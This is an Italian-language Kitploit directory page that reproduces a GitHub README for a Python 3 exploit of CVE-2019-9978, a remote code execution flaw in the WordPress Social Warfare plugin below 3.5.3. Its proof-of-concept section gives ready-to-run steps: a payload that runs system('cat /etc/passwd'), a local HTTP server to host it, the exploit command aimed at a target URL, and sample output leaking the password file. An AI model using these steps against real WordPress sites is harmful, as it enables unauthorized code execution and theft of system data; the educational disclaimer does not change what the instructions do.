Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-9978 — Una vulnerabilità di Remote Code Execution (RCE) nel plugin Social Warfare per WordPress, che interessa le versioni precedenti alla 3.5.3. | Kitploit
Strumenti/GitHubGitHub/echoosso/cve-2019-9978
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubechoosso/cve-2019-9978

CVE-2019-9978

Una vulnerabilità di Remote Code Execution (RCE) nel plugin Social Warfare per WordPress, che interessa le versioni precedenti alla 3.5.3.

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2019-9978 - Plugin Social Warfare WordPress RCE < 3.5.3

Una vulnerabilità di Esecuzione Remota di Codice (RCE) nel plugin Social Warfare per WordPress, che interessa tutte le versioni precedenti alla 3.5.3.


💡 Motivazione

L'exploit pubblico originale è stato scritto in una versione obsoleta di Python e non funziona più correttamente negli ambienti moderni.
Ho riscritto l'exploit per renderlo completamente compatibile con Python 3, rendendolo più facile da usare, comprendere e integrare negli strumenti moderni.


Prova di Concetto (PoC)

✅ Passo 1 – Creare il Payload

Crea un file chiamato payload.txt con il seguente contenuto:

root@kitploit:~
<pre>system('cat /etc/passwd')</pre>

✅ Passo 2 – Avviare un Server HTTP Python

Usa Python per servire il tuo payload:

root@kitploit:~
python3 -m http.server 8000

Questo renderà il tuo payload.txt accessibile all'indirizzo:

root@kitploit:~
http://<your-ip>:8000/payload.txt

✅ Passo 3 – Eseguire l'Exploit

root@kitploit:~
python3 CVE-2019-9978.py --target http://<target-ip>/wordpress \
                         --payload-uri http://<your-ip>:8000/payload.txt

Risultato Atteso

Se il target è vulnerabile, riceverai un output simile a:

root@kitploit:~
[*] Received Response From Server!
[<] Received:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

Screenshot

HTTP Server Receives Request

http-server

Successful Exploit Execution

exploit

Payload File Content

payload


🧬 Se questo payload ti ha rallegrato la giornata, una ⭐ farebbe piacere anche a me.

Dettagli Tecnici

  • Plugin: Social Warfare
  • Versioni Affette: < 3.5.3
  • CVE: CVE-2019-9978
  • Tipo di Vulnerabilità: Esecuzione Remota di Codice (RCE)
  • Autore Originale: @hash3liZer
  • Ricercatore: Luka Sikic

Crediti

  • Autore dell'Exploit: @hash3liZer
  • Rielaborazione Python 3: @echosso

⚠️ Disclaimer: Questo repository è solo a scopo educativo e di test etico.
L'uso non autorizzato di questo exploit contro sistemi di cui non si è proprietari è severamente proibito.

Scarica lo strumento